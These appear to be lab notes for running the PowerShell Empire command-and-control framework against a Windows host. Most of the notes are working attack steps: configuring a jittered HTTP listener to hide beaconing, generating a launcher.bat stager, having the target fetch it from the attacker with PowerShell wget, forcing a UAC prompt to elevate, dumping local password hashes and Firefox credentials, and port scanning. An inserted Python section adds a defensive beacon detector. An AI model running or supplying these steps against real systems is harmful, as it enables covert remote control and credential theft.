Linux:
cd /opt/empire/setup
sudo ./reset.sh ..cleanup previous history
Start normally:
sudo ./empire
agents ..like Metasploit sessions
info ..like show options
listeners ..like Metasploit's multi/handler
Module
searchmodule privesc
listeners
? ..help for listeners
Listener
uselistener ..<tab> lists the available listener types
uselistener http
info
DefaultJitter ..randomises the check-in interval so the beaconing is less regular (to hide)
KillDate ..agent stops working on this date
WorkingHours ..agent only checks in during these hours, silent otherwise
SlackChannel ..notifications in Slack
set DefaultDelay 1 ..1-second check-in, so commands come back faster
set Host http://10.x.x.x:8080
set Port 8080 ..redundant with the port in Host, but setting both avoids surprises
info
? ..help
execute
listener successfully started (the multi/handler equivalent)
listeners ..view current listeners
.. note: the listener could be given a name other than 'http'
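The DefaultDelay and DefaultJitter options above exist to make the agent's check-ins less regular. The Python below is an added example, not part of these notes and not Empire's own code. It models that timing under one labelled assumption (each sleep is DefaultDelay scaled by a uniform factor in 1 ± DefaultJitter; Empire's exact formula may differ) and then shows the defender's side: a small beacon detector that groups web-proxy requests per client/server pair and flags spacing that stays regular even with jitter applied. The log line format, the 10.0.0.x clients, the intranet.example host and the /example/path URI are all constructed for the example.

```python
"""Beacon-timing model and a jitter-tolerant beacon detector (added example)."""
import random
import statistics
from datetime import datetime, timedelta


# --- agent side: timing model (ASSUMPTION, not Empire's real sleep code) ---

def checkin_times(delay, jitter, count, start, seed=1):
    """Return `count` check-in timestamps for an agent configured with
    DefaultDelay `delay` (seconds) and DefaultJitter `jitter` (0.0-1.0).
    Each sleep is delay * (1 + u), u uniform in [-jitter, +jitter]."""
    rng = random.Random(seed)  # seeded so the example is reproducible
    times = [start]
    for _ in range(count - 1):
        sleep = delay * (1.0 + rng.uniform(-jitter, jitter))
        times.append(times[-1] + timedelta(seconds=sleep))
    return times


# --- defender side: look at request intervals per (client, server) pair ---

def interval_stats(times):
    """Median gap between requests and median absolute deviation (MAD) of
    the gaps. MAD is robust: jittered or occasionally late check-ins do
    not hide the underlying rhythm the way they would with a std-dev."""
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    med = statistics.median(gaps)
    mad = statistics.median(abs(g - med) for g in gaps)
    return med, mad


def looks_like_beacon(times, min_gaps=10, max_rel_spread=0.5):
    """True when there are enough requests and their spacing is regular
    enough (MAD/median at or below the threshold) to look like a sleep loop."""
    if len(times) < min_gaps + 1:
        return False
    med, mad = interval_stats(times)
    return med > 0 and mad / med <= max_rel_spread


def parse_log(lines):
    """Group request timestamps by (client, server). Constructed format:
    '<ISO timestamp> <client> <server> <path>' (one request per line)."""
    by_pair = {}
    for line in lines:
        ts, client, server, _path = line.split()
        by_pair.setdefault((client, server), []).append(datetime.fromisoformat(ts))
    for times in by_pair.values():
        times.sort()
    return by_pair


def flag_beacons(lines):
    """Map each (client, server) pair to True if its traffic looks like beaconing."""
    return {pair: looks_like_beacon(t) for pair, t in parse_log(lines).items()}


# --- constructed sample data ---
START = datetime(2024, 1, 1, 9, 0, 0)

# An agent talking to the listener from the notes (Host http://10.x.x.x:8080),
# here with DefaultDelay 5 and DefaultJitter 0.3. '/example/path' is a placeholder.
AGENT_LINES = [
    f"{t.isoformat()} 10.0.0.23 10.x.x.x:8080 /example/path"
    for t in checkin_times(delay=5, jitter=0.3, count=20, start=START)
]

# A person browsing an intranet site: irregular gaps between requests.
_HUMAN_GAPS = [2, 40, 1, 300, 5, 900, 3, 60, 120, 7, 400]
HUMAN_LINES = []
_t = START
for _g in _HUMAN_GAPS:
    _t += timedelta(seconds=_g)
    HUMAN_LINES.append(f"{_t.isoformat()} 10.0.0.24 intranet.example /page")

if __name__ == "__main__":
    for pair, hit in flag_beacons(AGENT_LINES + HUMAN_LINES).items():
        print(pair, "BEACON-LIKE" if hit else "ok")
```

With DefaultJitter at 0 every gap is identical and the ratio is 0; with 0.3 jitter the gaps spread over roughly 3.5 to 6.5 seconds but their MAD stays well under half the median, so the pair is still flagged, while the browsing pattern is not. Real traffic needs a longer window, allow-listing of known pollers and a second signal (URI, user agent, size), but the interval statistic is the part the jitter option is meant to defeat, and this shows how little it actually hides.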
Stager
back
usestager ..<tab> lists the available stagers
.. windows/hta ..good for getting past email filters
.. windows/macro ..good for use in a Word document
usestager windows/launcher_bat
info
set Listener http ..choose the listener we just started
generate ..writes /tmp/launcher.bat
---------------------------------------------------------------
Serve the stager with Python's built-in web server:
python3 -m http.server
---------------------------------------------------------------
Windows/Target
Download with Windows PowerShell:
PS> cd .\Desktop\
PS> wget http://x.x.x.x:8000/launcher.bat -OutFile launcher.bat
PS> dir
PS> notepad ./launcher.bat
Desktop > double-click launcher.bat
Connected
Linux: Empire now shows the agent as connected!!
agents
interact ABC123SESS
rename Agent1
info ..hostname, user, process, etc
list listeners
list agents
Doing more
usemodule <tab>
usemodule situational_awareness/host/winenum
.. also useful: collection/FoxDump ..dumps Firefox saved credentials
searchmodule powerup
usemodule privesc/powerup/allchecks
.. finds unquoted service paths
.. finds exes with weak permissions
.. expect some false positives
Elevated Modules
back
usemodule powershell/credentials/powerdump
.. the module list shows this one as powerdump* ..the * marks modules that need an elevated (admin) agent, it is not part of the command
info
run ..fails: must be run from an elevated agent
PrivEsc Modules
back
usemodule privesc/ask ..prompts the user with a UAC dialog to accept
.. no prompt appears if UAC is set to allow everything
set Listener http
run
agents
.. we now have a second agent marked * (higher privilege)
rename 8VDM9S2G AgentHIGH
Powerdump
interact AgentHIGH
usemodule credentials/powerdump ..listed as powerdump*, the * is only the elevated marker
dumps the local password hashes!!
back
shell ipconfig
shell whoami
Portscan
searchmodule portscan
usemodule situational_awareness/network/portscan
info
set Hosts 10.x.x.x
run
All agents at once
usemodule powershell/credentials/powerdump
info
set Agent all ..run the module on ALL agents
execute
Cleanup
agents
kill all
listeners
kill http
exit
cd /opt/empire/downloads/
cd AgentHIGH
less agent.log ..log of every command run on this agent and its output !!!!
cd /opt/empire/setup
sudo ./reset.sh ..cleanup previous history